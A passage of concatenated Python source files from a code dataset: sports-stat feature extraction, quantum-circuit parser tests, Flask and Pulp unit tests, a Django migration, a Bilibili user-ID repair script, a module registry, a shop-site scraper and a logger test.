\"draft_date\": game_day,\n \"name\": player.name,\n\n # \"player_id\": player.id,\n # \"team_id\": player.team.alias,\n # \"opponent_team_id\": opp_team.alias,\n\n # \"opponent_let_ppg\": get_opponent_ppg(opp_team),\n # \"home_game\": home_game,\n # \"vegas_total\": gl.game.away_team_score + gl.game.home_team_score,\n # \"opponent_fppg\": previous_fppg,\n\n \"trailing_1_FPPG\": average_stat(history, \"fanduel_score\", 1),\n \"trailing_1_MIN\": average_stat(history, \"stat_MIN\", 1),\n \"trailing_1_PTS\": average_stat(history, \"stat_PTS\", 1),\n \"trailing_1_REB\": average_stat(history, \"stat_REB\", 1),\n \"trailing_1_AST\": average_stat(history, \"stat_AST\", 1),\n \"trailing_1_BLK\": average_stat(history, \"stat_BLK\", 1),\n \"trailing_1_STL\": average_stat(history, \"stat_STL\", 1),\n \"trailing_1_TO\": average_stat(history, \"stat_TO\", 1),\n \"trailing_3_FPPG\": average_stat(history, \"fanduel_score\", 3),\n \"trailing_3_MIN\": average_stat(history, \"stat_MIN\", 3),\n \"trailing_3_PTS\": average_stat(history, \"stat_PTS\", 3),\n \"trailing_3_REB\": average_stat(history, \"stat_REB\", 3),\n \"trailing_3_AST\": average_stat(history, \"stat_AST\", 3),\n \"trailing_3_BLK\": average_stat(history, \"stat_BLK\", 3),\n \"trailing_3_STL\": average_stat(history, \"stat_STL\", 3),\n \"trailing_3_TO\": average_stat(history, \"stat_TO\", 3),\n \"trailing_5_FPPG\": average_stat(history, \"fanduel_score\", 5),\n \"trailing_5_MIN\": average_stat(history, \"stat_MIN\", 5),\n \"trailing_5_PTS\": average_stat(history, \"stat_PTS\", 5),\n \"trailing_5_REB\": average_stat(history, \"stat_REB\", 5),\n \"trailing_5_AST\": average_stat(history, \"stat_AST\", 5),\n \"trailing_5_BLK\": average_stat(history, \"stat_BLK\", 5),\n \"trailing_5_STL\": average_stat(history, \"stat_STL\", 5),\n \"trailing_5_TO\": average_stat(history, \"stat_TO\", 5),\n \"avg_FPPG\": average_stat(history, \"fanduel_score\", max),\n \"avg_MIN\": average_stat(history, \"stat_MIN\", max),\n \"avg_PTS\": average_stat(history, \"stat_PTS\", max),\n \"avg_REB\": average_stat(history, \"stat_REB\", max),\n \"avg_AST\": average_stat(history, \"stat_AST\", max),\n \"avg_BLK\": average_stat(history, \"stat_BLK\", max),\n \"avg_STL\": average_stat(history, \"stat_STL\", max),\n \"avg_TO\": average_stat(history, \"stat_TO\", n=max),\n \"FP\": fp,\n })\n except:\n # print(\"What's up with {} on {}, {} logs\".format(player.name, game_day, len(history)))\n return None\n\n\ndef average_stat_per_min(gls, stat, n):\n if len(gls) < 3:\n raise Exception(\"Need to have at least 3 game logs\")\n\n total_fp = sum([getattr(gl, stat) / gl.stat_MIN for gl in gls[:n]])\n avg = total_fp / float(min(len(gls), n))\n return avg\n\n\ndef average_stat(gls, stat, n, check_length=True):\n if len(gls) < 3 and check_length:\n raise Exception(\"Need to have at least 3 game logs\")\n\n total_fp = sum([getattr(gl, stat) for gl in gls[:n]])\n avg = total_fp / float(min(len(gls), n))\n\n # used = []\n # for gl in gls:\n # if not gl.zeroes:\n # used.append(gl)\n # if len(used) == n:\n # break\n #\n # if len(used) < 3:\n # raise Exception(\"Need to have at least 3 game logs with actual minutes played\")\n #\n # total_fp = sum([getattr(gl, stat) for gl in used])\n # avg = total_fp / float(min(len(used), n))\n\n return avg\n\n\ndef get_features_by_row(date):\n gls = GLDB[\"all\"]\n\n columns = [\"FP\", \"glid\", \"pid\", \"draft_date\", \"name\", ] + FEATURES\n rows = [df_row(gl.player_id, gl.game.date, gl=gl) for gl in gls]\n rows = [r for r in rows if r is not None]\n df = 
pd.DataFrame(data=rows, index=range(len(rows)), columns=columns)\n return df\n\n\ndef extract(game_day, save=False):\n load_gldb_if_empty(game_day)\n\n with Timed(\"#extract -- features.py\", header=True):\n # TODO - take out bad data? (not enough data for trailing_3 to work properly) see p285, p247, p100,\n\n with Timed(\"Building features dataframe\"):\n df = get_features_by_row(game_day)\n\n if save:\n with Timed(\"Writing to disk\"):\n df.to_csv(features_csv_filename(game_day))\n print(\"features with shape {} saved\".format(df.shape))\n\n return df\n","sub_path":"projects/wakka/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"282587258","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport platform\nimport tempfile\n\nimport pytest\n\nfrom projectq.backends import CommandPrinter\nfrom projectq.cengines import DummyEngine, MainEngine\nfrom projectq.ops import AllocateQubitGate, HGate, MeasureGate, SGate, TGate, XGate\n\n# ==============================================================================\n\n_has_qiskit = True\ntry:\n import qiskit # noqa: F401\n\n from ._parse_qasm_qiskit import read_qasm_file, read_qasm_str\nexcept ImportError:\n _has_qiskit = False\n\nhas_qiskit = pytest.mark.skipif(not _has_qiskit, reason=\"Qiskit is not installed\")\n\n# ------------------------------------------------------------------------------\n\n\n@pytest.fixture\ndef eng():\n return MainEngine(backend=DummyEngine(save_commands=True), engine_list=[])\n\n\n@pytest.fixture\ndef dummy_eng():\n dummy = DummyEngine(save_commands=True)\n eng = MainEngine(backend=CommandPrinter(accept_input=False, default_measure=True), engine_list=[dummy])\n return dummy, eng\n\n\n@pytest.fixture\ndef iqft_example():\n return '''\n// QFT and measure, version 1\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[4];\ncreg c[4];\nh q;\nbarrier q;\nh q[0];\n\nmeasure q[0] -> c[0];\nif(c==1) u1(pi/2) q[1];\nh q[1];\nmeasure q[1] -> c[1];\nif(c==1) u1(pi/4) q[2];\nif(c==2) u1(pi/2) q[2];\nif(c==3) u1(pi/2+pi/4) q[2];\nh q[2];\nmeasure q[2] -> c[2];\nif(c==1) u1(pi/8) q[3];\nif(c==2) u1(pi/4) q[3];\nif(c==3) u1(pi/4+pi/8) q[3];\nif(c==4) u1(pi/2) q[3];\nif(c==5) u1(pi/2+pi/8) q[3];\nif(c==6) u1(pi/2+pi/4) q[3];\nif(c==7) u1(pi/2+pi/4+pi/8) q[3];\nh q[3];\nmeasure q[3] -> c[3];\n'''\n\n\n# ==============================================================================\n\n\ndef filter_gates(dummy, gate_class):\n return [cmd for cmd in dummy.received_commands if isinstance(cmd.gate, gate_class)]\n\n\ndef exclude_gates(dummy, gate_class):\n return [cmd for cmd in dummy.received_commands if not isinstance(cmd.gate, gate_class)]\n\n\n# ==============================================================================\n\n\n@has_qiskit\ndef test_read_qasm_allocation(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg q[1];\ncreg 
c[1];\nqreg q2[3];\ncreg c2[2];\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q', 'q2'} == set(qubits_map)\n assert len(qubits_map['q']) == 1\n assert len(qubits_map['q2']) == 3\n assert {'c', 'c2'} == set(bits_map)\n assert len(bits_map['c']) == 1\n assert len(bits_map['c2']) == 2\n assert all(isinstance(cmd.gate, AllocateQubitGate) for cmd in eng.backend.received_commands)\n\n\n@has_qiskit\ndef test_read_qasm_if_expr_single_cbit(dummy_eng):\n dummy, eng = dummy_eng\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\nqreg a[1];\ncreg b[1];\nif(b==1) x a;\nmeasure a -> b;\nif(b==1) x a;\nmeasure a -> b;\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'a'} == set(qubits_map)\n assert len(qubits_map['a']) == 1\n assert {'b'} == set(bits_map)\n assert len(bits_map['b']) == 1\n assert len(filter_gates(dummy, AllocateQubitGate)) == 1\n assert len(filter_gates(dummy, XGate)) == 1\n assert len(filter_gates(dummy, MeasureGate)) == 2\n\n\n@has_qiskit\ndef test_read_qasm_custom_gate(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\n\nqreg q[3];\ncreg c[3];\ngate cH a,b {\nh b;\nsdg b;\ncx a,b;\nh b;\nt b;\ncx a,b;\nt b;\nh b;\ns b;\nx b;\ns a;\n }\ncH q[0],q[1];\n'''\n\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 3\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 3\n assert len(filter_gates(eng.backend, AllocateQubitGate)) == 3\n assert len(filter_gates(eng.backend, XGate)) == 3\n assert len(filter_gates(eng.backend, HGate)) == 3\n assert len(filter_gates(eng.backend, TGate)) == 2\n assert len(filter_gates(eng.backend, SGate)) == 2\n # + 1 DaggeredGate for sdg\n\n\n@has_qiskit\ndef test_read_qasm_opaque_gate(eng):\n qasm_str = '''\nOPENQASM 2.0;\ninclude \"qelib1.inc\";\n\nopaque mygate q1, q2, q3;\nqreg q[3];\ncreg c[3];\n\nmygate q[0], q[1], q[2];\n'''\n qubits_map, bits_map = read_qasm_str(eng, qasm_str)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 3\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 3\n assert len(eng.backend.received_commands) == 3 # Only allocate gates\n\n\n@has_qiskit\ndef test_read_qasm2_str(dummy_eng, iqft_example):\n dummy, eng = dummy_eng\n qubits_map, bits_map = read_qasm_str(eng, iqft_example)\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 4\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 4\n\n\n@has_qiskit\ndef test_read_qasm2_file(dummy_eng, iqft_example):\n dummy, eng = dummy_eng\n\n with tempfile.NamedTemporaryFile(mode='w', delete=True if platform.system() != 'Windows' else False) as fd:\n fd.write(iqft_example)\n fd.flush()\n qubits_map, bits_map = read_qasm_file(eng, fd.name)\n\n assert {'q'} == set(qubits_map)\n assert len(qubits_map['q']) == 4\n assert {'c'} == set(bits_map)\n assert len(bits_map['c']) == 4\n","sub_path":"projectq/libs/qasm/_parse_qasm_qiskit_test.py","file_name":"_parse_qasm_qiskit_test.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"108152873","text":"import unittest\nimport os,sys\nCURRENT_DIR = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.dirname(CURRENT_DIR+\"/../app/\"))\nfrom MainApp import app\n\nclass TestLocalRestApi(unittest.TestCase):\n def setUp(self):\n self.app = app.test_client()\n self.app.testing = True\n\n def testAppStatusCode(self):\n result = self.app.get('/')\n 
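# a GET on the root route should answer with HTTP 200\n        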
self.assertEqual(result.status_code, 200)\n\n def testAppResultData(self):\n result = self.app.get('/')\n originalData = '{\"message\": \"You can query only in this form: /rpn/\"}\\n'\n testData = bytes(result.data).decode('utf-8')\n self.assertEqual(testData, originalData)\n","sub_path":"project_ruby_python_go_RPN/app/Api_python/test/unitTestLocalRestApi.py","file_name":"unitTestLocalRestApi.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"276653391","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('blog', '0002_comment'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CommentReply',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('reply_text', models.TextField(max_length=350)),\n ('created_date', models.DateTimeField(default=django.utils.timezone.now)),\n ('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ('comment', models.ForeignKey(related_name='replies', to='blog.Comment')),\n ],\n ),\n ]\n","sub_path":"blog/migrations/0003_commentreply.py","file_name":"0003_commentreply.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"152082242","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2011 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. 
You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\nimport os\nimport sys\nimport mock\nimport unittest\n\nsys.path.insert(0, os.path.abspath(os.path.dirname(__file__)) + \"/../../../plugins/importers/\")\nfrom pulp_rpm.yum_plugin import util\nimport rpm_support_base\n\nclass TestVerifyOptions(rpm_support_base.PulpRPMTests):\n\n def setUp(self):\n super(TestVerifyOptions, self).setUp()\n self.data_dir = os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), \"../data\"))\n\n def tearDown(self):\n super(TestVerifyOptions, self).tearDown()\n\n def test_verify_options(self):\n def side_effect(path):\n # no-op to override file removal\n pass\n util.cleanup_file = mock.Mock()\n util.cleanup_file = side_effect\n test_pkg_path = os.path.join(self.data_dir, \"test_repo\", \"pulp-test-package-0.2.1-1.fc11.x86_64.rpm\")\n verify_options = dict(checksum=True, size=True)\n size = 2216\n checksum = \"4dbde07b4a8eab57e42ed0c9203083f1d61e0b13935d1a569193ed8efc9ecfd7\"\n checksum_type = \"sha256\"\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # check invalid size\n size = 1232\n t_exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(t_exists)\n\n # check None size\n size = None\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # check invalid checksum\n checksum=\"test_value\"\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(exists)\n\n # skip size/checksum checks\n verify_options = dict(checksum=False, size=False)\n exists = util.verify_exists(test_pkg_path, checksum, checksum_type, size, verify_options)\n self.assertTrue(exists)\n\n # invalid path\n test_pkg_fake_path = os.path.join(self.data_dir, \"test_fake_repo\", \"pulp-test-package-0.2.1-1.fc11.x86_64.rpm\")\n exists = util.verify_exists(test_pkg_fake_path, checksum, checksum_type, size, verify_options)\n self.assertFalse(exists)\n","sub_path":"pulp_rpm/test/unit/server/test_verify_options.py","file_name":"test_verify_options.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"617677371","text":"import numpy as np\nfrom scipy import signal\n\nwith open(\"input\") as f:\n\tlines = [[1 if c == \"#\" else 0 for c in l] for l in f.read().splitlines()]\nalgorithm = np.array(lines[0])\nimage = np.array(lines[2:])\n\nkernel = np.array([[1<<(i*3+j) for j in range(3)] for i in range(3)])\nfor i in range(50):\n\tfill = 0 if i % 2 == 0 else algorithm[0] # Value outside of image\n\tindices = signal.convolve2d(image, kernel, mode=\"full\", boundary=\"fill\", fillvalue=fill)\n\timage = algorithm[indices]\nprint(np.sum(image))\n","sub_path":"2021/day20/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"367486498","text":"import inspect\nimport logging\n\nimport mmcv\nimport torch\n\nlogger = logging.getLogger(__name__)\n\n\nclass Registry(object):\n\n def __init__(self, name):\n self._name = name\n self._module_dict = dict()\n\n def __repr__(self):\n format_str = self.__class__.__name__ + '(name={}, items={})'.format(\n self._name, list(self._module_dict.keys()))\n return 
format_str\n\n @property\n def name(self):\n return self._name\n\n @property\n def module_dict(self):\n return self._module_dict\n\n def get(self, key):\n return self._module_dict.get(key, None)\n\n def _register_module(self, module_class):\n \"\"\"Register a module.\n\n Args:\n module (:obj:`nn.Module`): Module to be registered.\n \"\"\"\n if not inspect.isclass(module_class):\n raise TypeError('module must be a class, but got {}'.format(\n type(module_class)))\n module_name = module_class.__name__\n if module_name in self._module_dict:\n raise KeyError('{} is already registered in {}'.format(\n module_name, self.name))\n self._module_dict[module_name] = module_class\n\n def register_module(self, cls):\n self._register_module(cls)\n return cls\n\n\ndef build_from_cfg(cfg, registry, default_args=None):\n \"\"\"Build a module from config dict.\n\n Args:\n cfg (dict): Config dict. It should at least contain the key \"type\".\n registry (:obj:`Registry`): The registry to search the type from.\n default_args (dict, optional): Default initialization arguments.\n\n Returns:\n obj: The constructed object.\n \"\"\"\n assert isinstance(cfg, dict) and 'type' in cfg\n assert isinstance(default_args, dict) or default_args is None\n args = cfg.copy()\n obj_type = args.pop('type')\n if mmcv.is_str(obj_type):\n obj_cls = registry.get(obj_type)\n if obj_cls is None:\n raise KeyError('{} is not in the {} registry'.format(\n obj_type, registry.name))\n elif inspect.isclass(obj_type):\n obj_cls = obj_type\n else:\n raise TypeError('type must be a str or valid type, but got {}'.format(\n type(obj_type)))\n if default_args is not None:\n for name, value in default_args.items():\n args.setdefault(name, value)\n\n jit = args.pop('jit', False)\n\n if not jit:\n return obj_cls(**args)\n\n jit_dump_graph_for = args.pop('jit_dump_graph_for', False)\n jit_dump_graph = args.pop('jit_dump_graph', False)\n jit_dump_code = args.pop('jit_dump_code', False)\n\n orig = obj_cls(**args)\n jitted = torch.jit.script(orig)\n orig._jitted = jitted\n _restore_load_state_dict_pre_hooks(orig, jitted)\n if jit_dump_graph_for:\n logger.info(jitted.graph_for, extra=cfg)\n if jit_dump_graph:\n logger.info(jitted.graph, extra=cfg)\n if jit_dump_code:\n logger.info(jitted.code, extra=cfg)\n return jitted\n\n\ndef _restore_load_state_dict_pre_hooks(orig, jitted):\n for key, hook in orig._load_state_dict_pre_hooks.items():\n jitted._load_state_dict_pre_hooks[key] = hook\n orig_children = dict(orig.named_children())\n for name, child in jitted.named_children():\n orig_child = orig_children[name]\n _restore_load_state_dict_pre_hooks(orig_child, child)\n","sub_path":"712f32a/mmdet/utils/registry.py","file_name":"registry.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"465749027","text":"import requests\nfrom basic import *\n\n\"\"\"\nParent company income statement\n\"\"\"\n\n\ndef ParentCompanyProfit(path, tradeKey, y_list_mlr):\n # print(tradeKey)\n try:\n f = open(path, \"r\", encoding=\"utf-8\").read()\n df = CutOutM(f, '、母公司利润表', '、合并现金流量表')\n df.reset_index(inplace=True, drop=True)\n # print(df)\n df = df.fillna('')\n Listkeys = df.keys()\n # print(df)\n jsonText = {'DG': []}\n for i in range(1, len(Listkeys)):\n # print(Listkeys[i])\n for j in range(len(y_list_mlr) - 2):\n # print(j)\n # Amount = df.iloc[j, [i]][0]\n # print(Listkeys[i],y_list_pf[j],Amount)\n jsonText['DG'].append(\n {'itemName': y_list_mlr[j],\n 'date': Listkeys[i],\n # 'putintoAmount': 
Amount,\n 'tradeKey': tradeKey}) # set up the key-value pairs and append\n dgdata = jsonText['DG']\n\n jsonData = json.dumps(dgdata, indent=4, separators=(',', ': '), ensure_ascii=False)\n data = json.loads(jsonData)\n # print(data)\n Success = requests.post('http://192.168.1.200:9008/parentCompanyProfit/add', json=data)\n print(Success)\n except Exception as e:\n print(e)\n pass\n","sub_path":"dgtable/parent_company_profit.py","file_name":"parent_company_profit.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190440589","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom python_scrapy_example.example_spider.items import ExampleSpiderItem\n\n\nclass DoubanSpiderSpider(scrapy.Spider):\n name = 'douban_spider'\n allowed_domains = ['movie.douban.com']\n start_urls = ['https://movie.douban.com/top250']\n\n def parse(self, response):\n item = ExampleSpiderItem()\n # print(response.text)\n movie_list=response.xpath('//*[@id=\"content\"]/div/div[1]/ol/li')\n for box in movie_list:\n\n item['serial_number']=box.xpath('.//em/text()').extract()[0]\n item['movie_name']=box.xpath('./div/div[2]/div[1]/a/span[1]/text()').extract()[0]\n # print(item['serial_number'])\n # print(item['movie_name'])\n yield item\n\n url = response.xpath('//*[@id=\"content\"]/div/div[1]/div[2]/span[3]/a/@href').extract()\n\n if url:\n page = 'https://movie.douban.com/top250' + url[0]\n yield scrapy.Request(page, callback=self.parse)\n # follow the next-page url\n\n","sub_path":"python_scrapy_example/example_spider/spiders/douban_spider.py","file_name":"douban_spider.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247867568","text":"import time\nimport random\nimport logging\nimport asyncio\nimport aiomysql\nimport traceback\nfrom config import MYSQL_CONFIG\nfrom utils.dao import redis_cache\nfrom utils.api_with_cookie import force_get_uid_by_name\nfrom config.log4 import crontab_task_logger as logging\n\n\nasync def fix_missed_uid(execute):\n query = await execute(\"select name, id from biliuser where uid is null;\")\n non_uid_users = {r[0]: r[1] for r in query}\n logging.info(f\"non_uid_users count: {len(non_uid_users)}\")\n\n # filter\n block_key_prefix = \"FIX_MISSED_USER_\"\n keys = [f\"{block_key_prefix}{name}\" for name in non_uid_users]\n result = await redis_cache.mget(*keys)\n non_blocked = {}\n blocked = []\n for i, key in enumerate(keys):\n name = key[len(block_key_prefix):]\n if result[i]:\n blocked.append(name)\n else:\n non_blocked[name] = non_uid_users[name]\n logging.info(f\"Failed users: {len(blocked)}, {blocked[:6]}...\")\n\n for current_name, non_uid_obj_id in non_blocked.items():\n uid = await force_get_uid_by_name(current_name)\n if not uid:\n await redis_cache.set(\n key=f\"{block_key_prefix}{current_name}\",\n value=\"f\",\n timeout=3600*24*random.randint(4, 7)\n )\n logging.warning(f\"Cannot get uid by name: `{current_name}`\")\n continue\n\n # check whether this uid already exists in the table; if not, write it directly\n duplicated = await execute(\"select id, uid, name, face from biliuser where uid = %s;\", uid)\n if not duplicated:\n r = await execute(\"update biliuser set uid=%s where id=%s;\", (uid, non_uid_obj_id), _commit=True)\n logging.info(f\"User obj updated! {current_name}({uid}), obj_id: {non_uid_obj_id}, r: {r}\")\n continue\n\n logging.info(f\"User {current_name}({uid}) duplicated, now fix it. 
\")\n has_uid_user_obj_id, uid, name, face = duplicated[0]\n\n # there are two user objects\n # 1. first update the name of the old existing user object\n await execute(\"update biliuser set name=%s where id=%s\", (current_name, has_uid_user_obj_id), _commit=True)\n\n # 2. migrate all raffle records\n r = await execute(\n \"update raffle set sender_obj_id=%s where sender_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n r2 = await execute(\n \"update raffle set winner_obj_id=%s where winner_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n # 3. migrate guard records\n r3 = await execute(\n \"update guard set sender_obj_id=%s where sender_obj_id=%s;\",\n (has_uid_user_obj_id, non_uid_obj_id),\n _commit=True\n )\n # 4. delete the empty user object\n r4 = await execute(\n \"delete from biliuser where id=%s;\",\n (non_uid_obj_id, ),\n _commit=True\n )\n logging.info(f\"Update {current_name}({uid}) done! sender: {r}, winner: {r2}, guard: {r3}, del: {r4}\")\n\n\nasync def main():\n start_time = time.time()\n conn = await aiomysql.connect(\n host=MYSQL_CONFIG[\"host\"],\n port=MYSQL_CONFIG[\"port\"],\n user=MYSQL_CONFIG[\"user\"],\n password=MYSQL_CONFIG[\"password\"],\n db=MYSQL_CONFIG[\"database\"]\n )\n\n async def execute(*args, _commit=False, **kwargs):\n async with conn.cursor() as cursor:\n await cursor.execute(*args, **kwargs)\n if _commit:\n await conn.commit()\n sql = args[0]\n if sql.startswith(\"select\"):\n return await cursor.fetchall()\n return cursor.rowcount\n\n try:\n await fix_missed_uid(execute)\n except Exception as e:\n logging.info(f\"FIX_DATA Error: {e}\\n{traceback.format_exc()}\")\n\n conn.close()\n cost = time.time() - start_time\n logging.info(f\"Execute finished, cost: {cost/60:.3f} min.\\n\\n\")\n\n\nloop = asyncio.get_event_loop()\nloop.run_until_complete(main())\n","sub_path":"crontab_task/fix_uid.py","file_name":"fix_uid.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"255849383","text":"import requests\nimport urllib.request\nimport time\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable\n\n# Set up the base URL\nurl = \"https://www.tintenalarm.de/\"\n\n# Getting response from the base URL\nresponse = requests.get(url)\n\n# Parsing the response to HTML using beautiful soup\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# Finding all the supplier list\nink_toner_supplier = soup.find(\"div\", {\"id\": \"droppable1\"})\n\n# Getting all the links of suppliers\nsuppliers = ink_toner_supplier.select('a[href]')\n\n# Initializing blank arrays\nsupplier_data = []\n\n# Initializing Table\nsupplier_table = PrettyTable(['SN', 'Brand', 'Title', 'URL'])\n\n# Index counter\nindex = 1\n\n# Parsing supplier data\nfor link in suppliers:\n if (str(link.get('title')) != \"\") & (str(link.get('title')) != \"None\"):\n data = str(link.text) + \"~\" + str(link.get('title')) + \"~\" + str(link.get('href'))\n supplier_table.add_row([str(index), str(link.text), str(link.get('title')), str(link.get('href'))])\n index = index + 1\n supplier_data.append(data)\n\nprint(supplier_table)\n\n# Set up the supplier URL\nsplit_data = supplier_data[0].split(\"~\")\nurl_supplier = split_data[2]\n\n# Getting response from the supplier URL\nresponse_supplier = requests.get(url_supplier)\n\n# Parsing the response to HTML using beautiful soup\nsoup_supplier = BeautifulSoup(response_supplier.text, \"html.parser\")\n\n# Finding all the supplier division (on the supplier page, so search soup_supplier rather than the base-page soup)\nsupplier_id_div = soup_supplier.find(\"div\", {\"class\": 
\"m_filterbutton4\"})\n\n# Finding all the supplier id\nsupplier_id = supplier_id_div.select('option')\n\n# Initializing blank arrays\nsupplier_brand_id = []\n\n# Initializing Brand Table\nsupplier_brand_id_table = PrettyTable(['SN', 'Brand', 'Brand ID'])\n\n# Index counter\nindex = 1\n\nfor sup_id in supplier_id:\n if str(sup_id.get('value')) != \"\":\n supplier_brand_id_table.add_row([str(index), str(sup_id.text), str(sup_id.get('value'))])\n index = index + 1\n data = str(sup_id.text) + \"~\" + str(sup_id.get('value'))\n supplier_brand_id.append(data)\n if index > 18:\n break\n\nprint(supplier_brand_id_table)\n\n# Initializing blank arrays\nmodel_category_id = []\n\n# Initializing model Category Table\nmodel_category_table = PrettyTable(['SN', 'Model Category', 'Category ID'])\n\n# Brand model Category URL\nurl_model_category = \"https://www.tintenalarm.de/ajax_search_mobile.php\"\n\n# Index counter\nindex = 1\n\n# Brand ID & Request Number with GET request\nfor brd_id in supplier_brand_id:\n # Splitting brand info\n split_data = brd_id.split(\"~\")\n brand_name = split_data[0]\n brand_id = split_data[1]\n request_id = \"1\"\n PARAMS = {'root': brand_id, 'number': request_id}\n model_category_response = requests.get(url=url_model_category, params=PARAMS)\n\n # Parsing the response to HTML using beautiful soup\n soup_model_category = BeautifulSoup(model_category_response.text, \"html.parser\")\n\n # Finding all the model category\n model_id_div = soup_model_category.find(\"div\", {\"class\": \"m_filterbutton4\"})\n\n # Finding all the supplier id\n model_category = model_id_div.select('option')\n\n # model Index counter\n model_index = 1\n\n for model_cat in model_category:\n if str(model_cat.get('value')) != \"\":\n model_category_table.add_row([str(model_index), str(model_cat.text), str(model_cat.get('value'))])\n model_index = model_index + 1\n data = str(model_cat.get('value'))\n model_category_id.append(data)\n\n # Initializing Brand Identifier Table\n model_brand_identity_table = PrettyTable(['SN', 'Brand', 'Brand ID', 'Total Models'])\n model_brand_identity_table.add_row([str(index), brand_name, brand_id, str(len(model_category_id))])\n\n print(model_brand_identity_table)\n print(model_category_table)\n\n break","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"476508688","text":"from pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\n\nfrom ..telemetry import Logger\n\nsns.set()\n\n\ndef test_logger(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.add_entry('foo', 'bar')\n\n entries = [\n ('a', 1),\n ('b', 2),\n ('c', 5)\n ]\n\n logger.add_entries(entries)\n\n expected_logs = {\n 'foo': 'bar',\n 'a': 1,\n 'b': 2,\n 'c': 5\n }\n\n assert expected_logs == logger.get_logs()\n\n\ndef test_pre_clear(logs_dir: Path):\n with Logger(logs_dir, clear_dir=True):\n\n # has new dir been created\n assert logs_dir.is_dir()\n\n # is this new dir completely empty\n assert not tuple(logs_dir.iterdir())\n\n\ndef test_child(logs_dir: Path):\n with Logger(logs_dir) as logger:\n logger.add_entry('foo', 'bar')\n with logger.get_child('child') as child_logger:\n child_logger.add_entry('foo-child', 'bar-child')\n\n child_dir = logs_dir.joinpath('child')\n\n # has new dir for child logger been created\n assert child_dir.exists()\n assert 'child' in logger.get_logs()\n\n\ndef 
